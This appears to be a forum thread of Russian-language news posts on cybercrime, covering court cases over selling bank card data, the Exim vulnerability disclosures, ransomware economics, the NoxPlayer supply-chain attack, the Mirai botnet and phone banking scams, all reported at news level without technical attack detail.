Прокуратура Климовичского района поддержала в суде государственное обвинение по уголовному делу в отношении 19-летнего местного жителя – ему инкриминировано совершение из корыстных побуждений незаконного распространения реквизитов банковских платежных карточек и аутентификационных данных, посредством которых возможно получение доступа к счетам.
Как установлено, учащийся колледжа в июне 2023 года, желая быстро и незаконно обогатиться, по просьбе знакомого с помощью мобильного телефона в социальной сети передал ему свои аутентификационные данные: сведения об используемом им абонентском номере, паспортные данные, пароли, присылаемые банком в SMS- сообщениях для подтверждения авторизации операций в системе дистанционного банковского обслуживания.
С использованием указанных сведений приятель открыл на имя обвиняемого счета в двух банках. Затем учащийся колледжа передал реквизиты банковских платежных карт, чем обеспечил знакомому доступ к его счетам и картам, за что получил 20 рублей.
Через несколько дней обвиняемый за материальное вознаграждение в сумме 60 рублей передал приятелю аутентификационные данные и реквизиты банковских платежных карт трех других молодых людей.
В судебном заседании молодой человек вину признал полностью и пояснил, что в июне 2023 года обучался в колледже, в связи с небольшим размером стипендии решил быстро и незаконно обогатиться.
С учетом представленных государственным обвинителем доказательств суд постановил обвинительный приговор. На основании ч.1 и ч.2 ст.222, Уголовного кодекса Республики Беларусь обвиняемому назначено наказание в виде лишения свободы на срок 3 года. В соответствии с ч.2 ст.77 Уголовного кодекса Республики Беларусь к нему применена отсрочка исполнения наказания на 2 года.
Кроме того, по правилам ч.2 ст.46-1 Уголовного кодекса Республики Беларусь суд применил специальную конфискацию: с обвиняемого в доход государства взысканы денежные средства, добытые преступным путем.
Приговор вступил в законную силу.
Проект Zero Day Initiative (ZDI) раскрыл сведения о неисправленных (0-day) уязвимостях (CVE-2023-42115, CVE-2023-42116, CVE-2023-42117) в почтовом сервере Exim, позволяющих удалённо выполнить свой код на сервере с правами процесса, принимающего соединения на 25 сетевом порту. Аутентификация для проведения атаки не требуется.
• Первая уязвимость (CVE-2023-42115) вызвана ошибкой в сервисе smtp и связана с отсутствием должных проверок данных, полученных от пользователя в процессе SMTP-сеанса и применяемых для расчёта размера буфера. В итоге, атакующий может добиться управляемой записи своих данных в область памяти за границей выделенного буфера.
• Вторая уязвимость (CVE-2023-42116) присутствует в обработчике NTLM-запросов и вызвана копированием полученных от пользователя данных в буфер фиксированного размера без необходимых проверок размера записываемой информации.
• Третья уязвимость (CVE-2023-42117) присутствует в процессе smtp, принимающем соединения на 25 TCP-порту, и вызвана отсутствием проверки входных данных, что может привести к записи переданных пользователем данных в область памяти за пределами выделенного буфера.
Уязвимости помечены как 0-day, т.е. остаются неисправленными, но в отчёте ZDI утверждается, что разработчики Exim были заранее уведомлены о проблемах. Последнее изменение в кодовой базе Exim произведено два дня назад и пока не ясно, когда проблемы будут устранены (производители дистрибутивов пока не успели среагировать так как информация раскрыта без деталей несколько часов назад). В настоящее время разработчики Exim готовятся к выпуску новой версии 4.97, но точных данных о времени её публикации пока нет. В качестве единственного на данный момент метода защиты упоминается ограничение доступа к SMTP-сервису на основе Exim.
Кроме вышеотмеченных критических уязвимостей раскрыта информация и о нескольких менее опасных проблемах:
• CVE-2023-42118 - целочисленное переполнение в библиотеке libspf2, проявляющееся при разборе макросов SPF. Уязвимость позволяет инициировать удалённое повреждение содержимого памяти и потенциально может использоваться для организации выполнения своего кода на сервере.
• CVE-2023-42114 - ошибка, приводящая к чтению из области памяти вне буфера в обработчике NTLM. Проблема может привести к утечке содержимого памяти процесса, обслуживающего сетевые запросы.
• CVE-2023-42119 - уязвимость в обработчике dnsdb, приводящая к утечке содержимого памяти процесса smtp.
Ransomware по республикански.
Всего в деле фигурируют восемь сотрудников различных отделов, в том числе по борьбе с экстремизмом и экономической безопасности. По версии следствия, в октябре 2022 года они задержали жителя ЛНР и пригрозили ему уголовным делом за сотрудничество со спецслужбами Украины. Задержанный с украинцами не сотрудничал, но под моральным и физическим давлением полицейских отдал им 3 миллиона рублей.
Большинство участников нехитрой схемы были задержаны ещё в ноябре прошлого года. Их заподозрили в превышении должностных полномочий и поместили под стражу. В начале июля 2023 года управление СК по ЛНР возбудило новое дело, на этот раз по статье о получении взятки в особо крупном размере. В рамках него 3 августа задержали ещё одного полицейского — 43-летнего сотрудника отдела ЦПЭ Игоря Авершина.
В пресс-службе МВД по ЛНР подтвердили задержание одного сотрудника, сейчас он отстранен. Остальные фигуранты в системе органов внутренних дел России службу не проходили, - сообщили в пресс-службе региональной полиции.
В Испании под Малагой задержан гражданин Латвии — глава подпольной лаборатории, изготавливавший фальшивые документы для клиентов из самых разных стран. Чтобы сбежать из Латвии, он изготовил реалистичную маску, и это новое «лицо» помогло ему обмануть биометрический контроль на пограничных постах и добраться до Испании незамеченным.
Как сообщает испанский портал diariosur.es, подозреваемый — латвиец по происхождению, поселился в Бенальмадене (курортный городок близ Малаги). На новом месте он создал подпольную лабораторию, где изготавливались поддельные документы — удостоверения всех типов и видов.
Для себя он использовал 25 разных личностей, постоянно меняя имена и биографии.
Его задержание стало возможным благодаря сотрудничеству агентов Национальной полиции Испании и сотрудников латвийской Госполиции, а также таможенным службам испанского Налогового агентства.
Этого человека уже арестовывали в Латвии, считая главарем группы, занимавшейся тем же самым — изготовлением поддельных документов. Как он сумел сбежать — пока неизвестно, но когда это случилось, латвийские правоохранительные органы подали его данные на розыск в европейский Интерпол.
Латвийские оперативники также сумели получить информацию, что беглец осел в Испании, где продолжает заниматься тем же самым. Только на этот раз организованная им группа была скромнее — в помощники себе он взял двух человек.
На основе этой информации, после длительных поисков испанская полиция обнаружила, что он скрывается в Бенальмадене. Более того, Службе таможенного надзора Налогового агентства Испании удалось перехватить посылку, которую подозреваемый отправил во Францию и где находилось поддельное удостоверение личности для клиента из еще одной европейской страны.
Нагрянув к латвийцу в домик у моря, испанские полицейские обнаружили инструменты для изготовления фальшивок, поддельные печати и бланки, значительные суммы денег. И ту самую маска, приклеив которую преступник оказывался с новым лицом.
В настоящий момент задержанный находится под стражей, испанская полиция готовится предъявить ему обвинение.
На видео: обыск в доме подозреваемого и задержание.
"Тактики BlackCat сильно влияют на ландшафт вымогательского ПО и тем самым наносят серьезный удар по организациям во всем мире", – пишет компания в своем отчете. "Судя по недавним атакам в странах Северной Европы, сумма выкупа, который требуют злоумышленники, превышает 2 млн. долларов".
Шифровальщик BlackCat используется против крупных компаний с ноября 2021 года. Построенный на его основе RaaS-сервис (Ransomware-as-a-Service, вымогательское ПО как услуга) связан партнерскими узами с брокерами доступа к чужим сетям.
По данным Resecurity, группировка становится все наглее – средний размер выкупа составляет $2,5 млн. Однако злоумышленники предлагают 50%-ную скидку жертвам, которые могут быстро заплатить деньги за дешифратор. В среднем вымогатели дают жертвам от 5 до 7 дней на оплату выкупа в BTC или XMR.
Кроме того, специалисты отметили общий тренд для вымогательского ПО: размер выкупа вырос на 82% с 2020 года, установив новый рекорд – $570 000 в первой половине 2021 года. К 2022 году сумма удвоилась, а к 2031 году может достигнуть $256 миллиардов.
source: resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is- increasing-stakes-up-to-25m-in-demands
Россияне ответственные за проведение сотен атак на компании энергетического сектора по всему миру, включая оператора атомной электростанции в Канзасе.
24 марта Госдепартамент США распространил информацию о розыске четырех граждан РФ, обвиняемых в организации кибератак на мировой энергетический сектор, в период с 2012 по 2018 годы.
Минюст утверждает, что хакеры действовали в период с 2012 по 2018 годы и провели за это время множество атак, нацеленных на тысячи компьютерных систем в 135 странах мира. Высокопоставленный представитель правоохранительных органов заявил, что в настоящее время сохраняется высокая вероятность атак на объекты критической инфраструктуры. Это заявление было сделано вскоре после того, как американский президент Байден заявил, что Россия, в ответ на санкции якобы может провести серию кибератак против США.
«Российские хакеры представляют серьёзную и постоянную угрозу для критической инфраструктуры как в США, так и во всём мире. Хотя предъявленные сегодня обвинения отражают прошлую деятельность, они подчёркивают, что американским предприятиям необходимо укреплять свою оборону и сохранять бдительность», — заявила заместитель генерального прокурора Лиза Монако.
Американский минюст утверждает, что россиянин Евгений Гладких нанес ущерб «критически важной инфраструктуре за пределами Соединенных Штатов», из-за чего на иностранном целевом объекте произошли аварийные отключения.
Еще трое обвиняемых — Павел Акулов, Михаил Гаврилов, Марат Тюков — готовились взломать «компьютеры сотен организаций, связанных с энергетическим сектором по всему миру», утверждает ведомство.
В числе жертв кибератак, которые оказали содействие в расследование, Минюст США называл французскую Schneider Electric, а также американские компании Wolf Creek, Evergy Inc и Kansas Electric Power Cooperative Inc.
source: justice[.]gov/opa/pr/four-russian-government-employees-charged-two- historical-hacking-campaigns-targeting-critical
Стало известно, что десятки журналистов и правозащитников в Сальвадоре
Центральной Америки пострадали от взлома шпионского программного обеспечения.
Их мобильные телефоны попали под атаку шпионского ПО.
Citizen Lab исследовательская группа из Канадского Университета Торонто, сообщила 12 января(по местному времени), что сотовые телефоны 35 журналистов и правозащитников из Сальвадора в период с июля 2020 года по ноябрь прошлого года были заражены шпионской программой Pegasus от Израильской охранной фирмы NSO Group.
Если мобильный телефон заражен шпионским ПО, личная информация, содержащаяся в мобильном телефоне, может стать предметом утечки и прослушивания.
Среди выявленных на этот раз жертв хакерских атак в Сальвадоре больше всего было репортеров интернет-издания El Faro.
El Faro разоблачил обвинения в том, что президент Найиб Букеле заключил какую-
то сделку с крупной бандой, чтобы снизить уровень убийств в преддверии выборов
в сентябре 2020 года.
В то время президент Букеле полностью отверг обвинения.
El Faro передавали, что мобильные телефоны 22 сотрудников были взломаны 226 раз в период с 2020 по 2021 год.
В отчете говорится, что нет никаких технических доказательств того, что
правительство Сальвадора было объектом хакерской атаки.
Но обстоятельства предполагают, что правительство скорее всего стоит за этим.
NSO Group настаивает на продаже Pegasus только законным государственным учреждениям.
По данным Associated Press и Reuters, после публикации отчета правительство Сальвадора возразило что не является клиентом NSO Group и не имеет права использовать этого типа шпионского ПО.
Ранее, в июле прошлого года, крупные СМИ по всему миру, в том числе Washington Post(WP), получили более 50,000 телефонных номеров связанных с Pegasus и разоблачили что Pegasus использовался для взлома журналистов, правозащитников и бизнесменов по всему миру.
Craig Wright выйграл суд.
не нашел на русском или англЦком языке, есть на немецком:

](https://www.nau.ch/news/wirtschaft/angeblicher-bitcoin-erfinder-craig- wright-gewinnt-gerichtsverfahren-66062783)
Craig Wright alias Satoshi Nakamoto hat ein Gerichtsverfahren gewonnen. Der angebliche Erfinder von Bitcoin kann 1,1 Millionen Bitcoin behalten.
www.nau.ch
что он Satoshi суд не смог
определить
но то что он вместе с David Kleiman намайнил битки установили
1 100 000 битков(пр.55 млрд.$) он должен получить? и хочет продать большую
часть,
и пожертвовать деньги куда то. 🗝

](https://t3n.de/news/bitcoin-erfinder-millionen-btc-1435009/)
Craig Wright, der australische Unternehmer, der von sich selbst behauptet, Satoshi Nakamoto zu sein, hat ein Verfahren vor einem US-Gericht gewonnen.
t3n.de
Microsoft has open-sourced CodeQL queries that developers can use to scan
source code for malicious implants matching the SolarWinds supply-chain
attack.
In December, it was disclosed that threat actors hacked SolarWinds to modify
the legitimate SolarWinds Orion platform in a supply-chain attack. This attack
allowed the threat actors to gain remote access to customers' systems who use
the SolarWinds Orion network management platform.
Microsoft disclosed that their systems were compromised by this supply-chain
attack and allowed the attackers to access limited amounts of
source code for Azure, Exchange, and Intune.
To make sure the attackers did not modify their code, Microsoft created CodeQL queries that were used to scan their codebase for malicious implants matching the SolarWinds IOCs.
Today, Microsoft has released their [SolarWinds CodeQL queries](http://github.com/github/codeql/blob/cba9f421ad3ec153c5a6c4167bca5868502c8fab/csharp/ql/src/experimental/Security%20Features/campaign/Solorigate- Readme.md) so that users can scan their source code for potential malicious implants.
"In this blog, we'll share our journey in reviewing our codebases, highlighting one specific technique: the use of CodeQL queries to analyze our source code at scale and rule out the presence of the code-level indicators of compromise (IoCs) and coding patterns associated with Solorigate."
"We are open sourcing the CodeQL queries that we used in this investigation so that other organizations may perform a similar analysis," announced Microsoft in a new [blog post](https://www.microsoft.com/security/blog/2021/02/25/microsoft-open- sources-codeql-queries-used-to-hunt-for-solorigate-activity/).
CodeQL is a semantic code analysis engine that allows developers to query their code for syntactic data or behavior similar to specific functionality.
Semantic code analysis does not check whether source code is syntactically correct but instead matches the "meaning" of the code.
Using CodeQL, developers can
build a database of functionality and syntactic elements from their codebase
and query it for a particular behavior.
Developers can then share CodeQL queries publicly to allow other devs to scan
their code for similar functionality.
With Microsoft's release of SolarWinds CodeQL queries, developers can scan their source codebase for functionality or syntactic code elements that match those used by the malicious implants from the SolarWinds attack.
CodeQL query to find
modified FNV-A1 hash function
Microsoft's CodeQL queries check for a wide range of behavior used by the
SolarWinds implants, including command and control
communication,
a modified FNV-1A hash
function,
use of Windows APIs found in backdoor
functionality,
and "time-bomb"
functionality.
Microsoft warns that some of these CodeQL queries can find similar behavior in benign code, so it is essential to manually review any detections to ensure they are not false positives.
«Если вы подтверждаете перевод денег, то нажмите 1, если нет – нажмите «2» – примерно с таких слов началась афера для 50-летней жительницы Славянска.
В полицию Славянска обратилась местная жительница и сообщила о том, что ее обманули телефонные мошенники. Женщина рассказала, что получила звонок от «банка». Ей предложили подтвердить банковскую операцию или связаться с оператором. Никаких денежных переводов она не делала, поэтому, следуя инструкции, связалась с «оператором».
Во время разговора с работником банка заявительницу заверили, что ее счет атакуют мошенники, и, чтобы защититься от них, она должна перечислить все средства с этого счета. Ей предложили пополнить номера мобильных счетов и пообещали, что эти деньги будут ей возвращены. Номера телефонов для переводов потерпевшей прислали аферисты. Всего женщина перечислила 37500 гривен.
Также жертвой "банковских работников" стала и 39-летняя женщина. Она рассказала полицейским о том, как ей позвонил неизвестный, который представился работником банка и предложил повысить безопасность ее счета.
Следуя указаниям, женщина сообщила 16-значный номер карты и 3-значный код безопасности. Когда вскоре после этого ей стали приходить смс-сообщения с паролями, она сообщила "специалисту" их содержание. Вскоре со счета исчезло четыре тысячи гривен.
А 32-летний мужчина на одном из известных сайтов выбрал холодильник, связался с продавцом и договорился об условиях. Мужчина перевел на указанный счет 25% от стоимости товара. Заказ он так и не получил.
Аналитики компании Chainalysis подсчитали, что криптовалюту, как правило, отмывают через совсем небольшой кластер онлайн-сервисов, в числе которых обменники с высокой степенью риска (с низкой репутацией), игорные платформы, специальные миксер-сервисы, а также финансовые сервисы, работающие с криптовалютой, но расположенные в юрисдикциях с высоким уровнем риска.
Для сбора статистики исследователи изучили криптовалютные адреса, связанные с мошенничеством, атаками шифровальщиков, финансированием терроризма, взломами, жестоким обращением с детьми, а также платежи, связанные с даркнет- маркетплейсами, где продают наркотики, оружие и ворованные данные.

Оказалось, что лишь небольшая группа из 270 блокчейн-адресов отмыла около 55% всех криптовалют, связанных с различной преступной деятельностью. Боле того, всего через 1867 адресов прошло примерно 75% всех криптовалют, связанных с преступностей активностью в 2020 году, то есть порядка 1,7 миллиарда долларов.

«На этот раз концентрация выше, чем в 2019 году. В частности, мы видим, что большая доля незаконной криптовалюты направляется на адреса, принимающие криптовалюту на сумму от 1 до 100 миллионов долларов в год», — пишут исследователи.
Click to expand...
По словам аналитиков, возросшая концентрированность депозитных адресов, через которые проходит незаконная криптовалюта, хорошо демонстрирует растущую зависимость преступников от небольшой группы внебиржевых брокеров и других сервисов, специализирующихся на отмывании денег.
Chainalysis резюмирует, что в настоящее время сфера отмывания криптовалюты находится в весьма уязвимом положении. Дело в том, что всего несколько хорошо спланированных операций правоохранительных органов, направленных на такие сервисы, могут помешать перемещению незаконных средств множества преступных групп.
Источник: xakep.ru/2021/02/16/crypto-laundering/
Эксперты компании ESET обнаружили атаку на цепочку поставок, в ходе которой неизвестная хак-группа скомпрометировала разработчиков популярного Android- эмулятора NoxPlayer и добила малварь в его код.
NoxPlayer бесплатен и предназначен для эмуляции Android- приложений на компьютерах под управлением Windows или macOS. Эмулятор разрабатывает гонконгская компания BigNox, и им пользуются более 150 000 000 пользователей в 150 странах мира.
Исследователи пишут, что обнаружили нацеленную на BigNox атаку 25 января 2021 года. По их данным, злоумышленники скомпрометировали один из официальных API компании (api.bignox.com), а также серверы для хостинга файлов (res06.bignox.com). Используя полученный доступ, хакеры "поработали" с URL- адресом для загрузки обновлений и в итоге распространили среди пользователей NoxPlayer малварь.
«Было замечено, что через вредоносные обновления среди избранных жертв распространялись три семейства вредоносных программ. Они не содержат каких- либо признаков того, что хакеры преследуют финансовую выгоду, и скорее предназначены для слежки», — гласит отчет ESET.
Click to expand...

Схема атаки
Через NoxPlayer распространялись следующие угрозы. Ранее неизвестный вредонос, позволяющий следить за жертвами, также способный выполнять команды, полученные от управляющего сервера, удалять файлы, выполнять команды, скачивать и выгружать файлы и так далее. Другие два вредоноса были уже известны экспертам: это были вариации Gh0st RAT (с возможностями кейлоггера) и PoisonIvy RAT.
Хотя аналитики полагают, что злоумышленники имели доступ к серверам BigNox по крайней мере с сентября 2020 года, хакеры не атаковали всю немалую пользовательскую базу компании, а вместо этого сосредоточили усилия на конкретных машинах. Исходя из этого, специалисты делают вывод, что обнаружили узко таргетированную атаку, направленную на заражение определенного класса пользователей. Так, пока было выявлено лишь пять человек, пострадавших от зараженной версии NoxPlayer, которые находятся на Тайване, в Гонконге и Шри- Ланке.
«Мы еще расследуем данный инцидент, но уже обнаружили заметную взаимосвязь с хакерской группой, которую мы называем Stellera. Об этой группировке мы детально расскажем в ближайшем будущем», — обещают исследователи.
Click to expand...
Взаимосвязь и сходства, которые отмечают эксперты ESET, связаны с тем, что все три вредоноса, развернутые через обновление NoxPlayer, весьма похожи на другую малварь, которую использовали во время взлома сайта администрации президента Мьянмы (2018 год) и университета Гонконга (2020 год).
Источник: xakep.ru/2021/02/02/noxplayer-hacked/
После демонтажа несанкционированных вышек сотовой связи и трансграничных кабелей власти Таиланда начали изымать терминалы Starlink для борьбы с киберпреступностью
В рамках борьбы с киберпреступностью в Таиланде Министерство цифровой экономики и общества (МЦЭиО) совместно с соответствующими ведомствами конфисковало 58 комплектов оборудования спутниковой связи Starlink, которое мошенники планировали использовать для приема и передачи высокоскоростного интернет-сигнала через спутник.
Министр МЦЭиО Прасерт Джантараруангтонг сообщил, что меры по пресечению онлайн-преступлений, особенно демонтаж несанкционированных вышек сотовой связи и трансграничных кабелей, вынудили преступные группы изменить свои методы, чтобы избежать проверок и пресечения деятельности. В связи с этим министерство и соответствующие ведомства скорректировали свою работу и усилили координацию с силовыми структурами для противодействия мошенникам.
Изъятое оборудование Starlink, которое представляет собой спутниковые терминалы для приема и передачи интернет-сигнала, было представлено министром на пресс-конференции во вторник. В совместной операции участвовали Центральное бюро расследований, Национальная комиссия по телерадиовещанию и телекоммуникациям и государственное предприятие «National Telecom».
Устройства Starlink были изъяты в пункте доставки посылок в провинции Чантхабури. Предполагается, что терминалы принадлежали банде телефонных мошенников и сети онлайн-казино, которые намеревались переправить приемники на тайско-камбоджийскую границу, а затем передать их сообщникам вблизи границы с Мьянмой для использования в онлайн-преступлениях.
Все изъятые устройства считаются незаконно ввезенными в страну для продажи в обход таможенных процедур, что подпадает под действие Таможенного закона 2017 года. Кроме того, 10 июня Королевский военно-морской флот Таиланда в лице Командования пограничной обороны Чантхабури и Трат провел проверку и конфисковал еще шесть коробок с комплектами спутникового оборудования Starlink. Ввоз всех этих устройств в Таиланд не разрешен Национальной комиссией по телерадиовещанию и телекоммуникациям и является незаконным.
По данным министерства, в апреле ущерб от онлайн-мошенничества составлял 110 миллионов батов в день, что на 26% меньше, чем в марте, когда он достигал 149 миллионов батов в день. Власти Таиланда продолжают активную борьбу с киберпреступностью, пресекая незаконное использование передовых технологий, таких как спутниковый интернет Starlink.
Более двух лет назад Алехандро Касерес, известный в киберпространстве под псевдонимом P4x, начал свою одиночную кибервойну. Работая из дома на побережье Флориды, он запустил серию собственных программ с ноутбука и облачных серверов, благодаря чему на протяжении более недели регулярно отключал все доступные веб-сайты Северной Кореи. Это действие было ответом на попытки северокорейских шпионов похитить его личные рабочие инструменты.
Касерес, 38-летний колумбийско-американский предприниматель решил самостоятельно наказать режим Ким Чен Ына за агрессивные действия против американских хакеров. По его словам, это было «правильное решение». Находясь в конфликте с собственным правительством, которое не предоставило ему поддержку после обращения в ФБР, он ожидал возможных обвинений, но вместо этого столкнулся с интересом со стороны государственных агентств США, которые предложили ему сотрудничество.
На протяжении следующего года Касерес участвовал в секретных проектах американских военных агентств, представляя свои методы высокопоставленным чиновникам обороны и разведки.
В начале своей карьеры Касерес работал на подрядчика Пентагона и был вовлечен в различные проекты по исследованию киберпространства. Он разработал несколько программ для сканирования темных уголков интернета, что стало частью программы Darpa's Memex. Эти навыки и опыт позволили ему позже создать Hyperion Gray — компанию, которая также работала как с государственными, так и с частными клиентами. Касерес активно участвовал в хакерских конференциях вроде Defcon, делал доклады о методах использования облачных технологий для усиления мощности атак.
В конце концов, после нескольких встреч с представителями различных ведомств, Касерес предложил модель быстрых и целенаправленных кампаний, сравнимую с операциями спецназа. Его идея заключалась в создании особых спецподразделений в киберпространстве: малых, гибких групп, способных быстро и эффективно выполнять различные задачи. Каждый член такой команды мог бы действовать аналогично 16 обычным солдатам на киберполе боя, увеличивая эффективность атак в сотни раз по сравнению с обычными методами.
Задумка, хотя и была встречена с интересом, так и осталась на бумаге из-за внутренних бюрократических препятствий и консервативных взглядов чиновников.
Разочарованный опытом сотрудничества с правительством, Касерес теперь открыто выступает под своим настоящим именем, призывая к более активному использованию киберсил США для защиты национальной безопасности. Он утверждает, что Америка должна продемонстрировать свою решимость и готовность к действиям, нацеленным на защиту от нападок иностранных держав и шпионажа.
Оглядываясь назад, Касерес говорит, что не жалеет о своих действиях. Он считает, что его атаки послужили не только местью, но и уроком для международных агрессоров и сограждан.
sc: wired.com/story/p4x-north-korea-internet-hacker-identity-reveal
В 2016 году трое молодых американских хакеров, не так давно начавших свой путь в данной сфере, создали ботнет под названием Mirai, с помощью которого на протяжении долгого времени атаковали крупнейшие медиа, веб-сайты и компании. Их целью было привлечь внимание к проблеме уязвимостей интернета вещей и ненадёжности многих подключенных к сети устройств.
19-летний Джосайя Уайт, 20-летний Парас Джа и 21-летний Далтон Норман познакомились на хакерском форуме, где и решили объединить усилия, чтобы создать мощный инструмент для DDoS-атак.
Ботнет Mirai использовал заражённые IoT-устройства, такие как IP-камеры, роутеры, цифровые видеорегистраторы и другие гаджеты, в качестве «зомби», бездумно выполняющих команды злоумышленников. Хакеры долгое время сканировали Интернет в поисках уязвимых устройств и взламывали их с помощью паролей по умолчанию или известных уязвимостей, добавляя в свою растущую армию ботов.
В сентябре 2016 года Mirai атаковал сайт журналиста Брайана Кребса, который в то время расследовал деятельность Booter-сервисов. Атака достигала 620 Гбит/с — это была самая мощная DDoS атака за всю историю интернета на тот момент. Сайт Кребса вынужден был отключиться на несколько дней.
Вскоре после этого молодые киберпреступники опубликовали исходный код Mirai на хакерских форумах, чтобы замести следы своего авторства. Это привело к стремительному распространению разнообразных копий Mirai по всему миру.
21 октября 2016 года одна из таких копий атаковала сервис DNS-провайдера Dyn и нарушила работу Twitter, Spotify, Reddit, Github и многих других сервисов на несколько часов по всей Америке. Это происшествие назвали самым крупным сбоем Интернета в истории.
После атаки на Dyn ФБР вышло на след создателей Mirai и вскоре задержало их. Хакерам пришлось пойти на сделку со следствием и на протяжении долгих месяцев помогать ФБР ловить других киберпреступников, использующих их детище в преступных целях.
В итоге в 2018 году суд приговорил Уайта, Джа и Нормана к штрафам в размере от 115 до 127 тысяч долларов и общественным работам, но не к тюремному заключению.
Когда срок общественных работ подошёл к концу, парни продолжили работать на ФБР в качестве экспертов по кибербезопасности. Они помогали отслеживать IoT- ботнеты, ловить злоумышленников и устранять уязвимости, которые сами же когда- то эксплуатировали.
История Mirai ярко продемонстрировала опасность ненадёжных IoT-устройств и острую необходимость повышения кибербезопасности. Ведь выпуск на рынок каждого такого устройства опасен не для производителя или конечного пользователя устройства, а в первую очередь для всех остальных пользователей Интернета.
Создатели Mirai наглядно показали, насколько легко атаковать ключевую инфраструктуру интернета, используя уязвимые бытовые гаджеты, о существовании которых многие компании в сфере кибербезопасности даже не подозревали.
После Mirai появилось множество похожих IoT-ботнетов, основанных на его исходном коде. Хотя атаки такого разрушительного масштаба больше не повторялись, угроза остаётся актуальной по сей день.
Крупные компании и провайдеры стали гораздо серьёзнее относиться к защите своих систем от DDoS. В свою очередь, и пользователи также должны обращать куда больше внимания на безопасность своих устройств, устанавливая нестандартные учётные данные и регулярно проверяя доступные обновления прошивки.
Опыт Mirai заставил производителей уделять больше внимания безопасности IoT- гаджетов ещё на этапе их проектирования. Но многие устройства по-прежнему остаются крайне уязвимыми для хакеров.
Эксперты не исключают, что в будущем злоумышленники могут создать IoT-ботнеты куда большего масштаба, чем Mirai, и организовывать ещё более разрушительные кибератаки.
Поэтому вопросы кибербезопасности должны оставаться приоритетом как для государства, так и для бизнеса. Только совместными усилиями можно эффективно противодействовать подобным угрозам.
В Челябинске неизвестные дважды напали на майнинг-отель и украли всё оборудование. Владелец бизнеса предоставлял устройства для добычи криптовалют на платной основе. Несмотря на наличие видеокамер и сигнализации, воры смогли проникнуть в помещение.
В первый раз они унесли оборудование стоимостью 2 млн рублей. Владелец обратился в полицию, но не удалось выяснить личности преступников. Спустя время, налетчики вернулись, отключили видеокамеры и похитили оставшуюся технику, которая стоила 20 млн рублей.
В Сочи житель Кемерово украл у тещи сейф с 17 млн рублей и драгоценностями.
Зять украл у жительницы Хостинского района сейф, в котором хранились около 17 млн руб., ювелирные изделия и брендовые часы. Об этом сообщает пресс-служба ГУ МВД по Краснодарскому краю. С сообщением о краже женщина обратилась в полицию.
На записях с камер видеонаблюдения в доме потерпевшей видно, что ее зять, 33-летний житель Кемерово, вместе с водителем такси вынесли сейф из дома и уехали. После этого мужчину с сейфом доставили в мастерскую, рабочие которой распили металлический ящик. Злоумышленник забрал содержимое сейфа и уехал. Почти все деньги он потратил на развлечения, а затем отправился на такси в родной город.
Работники таксопарка и мастерской не подозревали мужчину в краже, поскольку нарушитель придумал историю о том, как потерял ключи, и попросил отвезти его в цех, чтобы вскрыть сейф. Сочинские полицейские, командированные в Кемеровскую область, задержали мужчину в квартире его сестры.
Драгоценности удалось изъять и вернуть обратно владелице. Отдел полиции Хостинского района возбудил в отношении мужчины уголовное дело по ч. 4 ст. 158 УК РФ (кража) Ему грозит до 10 лет лишения свободы. Мужчину заключили под стражу на период предварительного следствия.
Верховный судья Республики Беларусь отклонил апелляцию соотечественника, которого оштрафовали на 2 700 000 белорусских рублей ($996 000) за организацию обменника цифровых валют.
Изначально вердикт о крупном штрафе вынес Экономический суд города Минска. Это лишь административный штраф и других наказаний за создание криптовалютного обменника не предполагается. Однако, белорус «хотел штраф поменьше».
«Гражданин А. в январе 2021 года с использованием аккаунта в Telegram организовал незаконный обмен криптовалют, что запрещено законодательством, и в результате своей деятельности получил доход в размере 5 400 000 рублей. Сам факт незаконной деятельности гражданин не оспаривал», ― уверяют местные правоохранители.
Организатор обменника должен отдать государству примерно половину предполагаемого дохода, поэтому Верховный суд счел приговор «законным и обоснованным».
В связи с приближением открытия зимних Олимпийских игр в Пекине через две
недели приложений китайского производства в сфере угрозы безопасности снова
возросла.
Эксперты по кибер безопасности рекомендовали участникам Олимпийских игр
использовать временный мобильный телефон и открыть новую учетную запись
электронной почты для безопасности.
канадская охранная компания Citizen Lab предупредила об уязвимостях в
безопасности приложений, используемых во время пекинской Олимпиады,
и возможных угрозах безопасности в Китае в этот период в отчете опубликованном
на том же сайте.
Citizen Lab предупредила, что безопасность приложения My 2022 используемого
спортсменами, СМИ и зрителями во время Олимпийских игр в Пекине слаба.
Также подтвердили что оно не обеспечивает шифрование при отправке и получении
файлов через приложение,
а также имеет возможность помечать «цензурированные ключевые слова и
политически чувствительные» выражения.
При этом компания посоветовала спортсменам и посетителям Олимпийских игр взять
с собой временный мобильный телефон или открыть для использования новую
учетную запись электронной почты.
Также был совет не использовать повторно временный телефон, который
использовался при выезде из Китая.
В интервью государственному информационному агентству Синьхуа 18-го числа
представитель оргкомитета зимних Олимпийских игр в Пекине
назвал все действия оргкомитета Олимпийских игр строгими соответствующими
законами, в том числе китайским Законом о защите личной информации.
Однако страны-участницы не доверяют объяснениям Китая. Некоторые страны уже дали своим игрокам инструкции по использованию новых устройств, таких как временные мобильные телефоны.
В США посоветовали спортсменам арендовать или утилизировать компьютеры для
использования на Олимпиаде вместе с временными телефонами.
Ранее Великобритания и Нидерланды договорились предоставить участникам своей
олимпийской сборной временные мобильные телефоны.
Оператор вымогателя получает долю прибыли в размере от 20% до 40% от выкупа, а оставшиеся 60%-80% остаются у партнера.
Специалисты из «Лаборатории Касперского» провели анализ трех крупных подпольных форумов, на которых распространяются программы-вымогатели. Общая экономика программ-вымогателей хорошо развита и сложна в вопросах предоставления услуг между хакерами. Например, владелец ботнета предлагает доступ к уже взломанным устройствам, разработчики программного обеспечения улучшают вредоносное ПО, брокеры начального доступа специализируются на предоставлении доступа к сети через бэкдоры или эксплуатацию уязвимостей в протоколе удаленного рабочего стола (Remote Desktop Protocol, RDP).
В киберпреступном подполье образцы и сборщики вымогательского ПО стоят от $300 до $4 тыс., а аренда «вымогательского-ПО-как-услуги» может обойтись злоумышленнику в сумму от $120 до $1,9 тыс. в год.
«Доступ выставляется на продажу на аукционе или по фиксированной цене, начиная с $50. Злоумышленники, обеспечивающие первоначальную компрометацию, чаще всего являются либо владельцами ботнетов, работающими над масштабными кампаниями, либо хакерами, которые постоянно ищут новые уязвимости в программном обеспечении и используют их до выпуска патчей», — сообщили эксперты.
На форумах размещаются сотни различных объявлений и предложений, начиная от продажи исходного кода и заканчивая регулярно обновляемыми сообщениями о найме партнеров, доступными на английском и русском языках.
«Продажа исходного кода программ-вымогателей — самый простой способ заработать с точки зрения технических навыков и усилий, вложенных продавцом. Однако такие предложения также приносят меньше всего денег, поскольку исходный код и образцы быстро теряют свою ценность», — отметили эксперты.
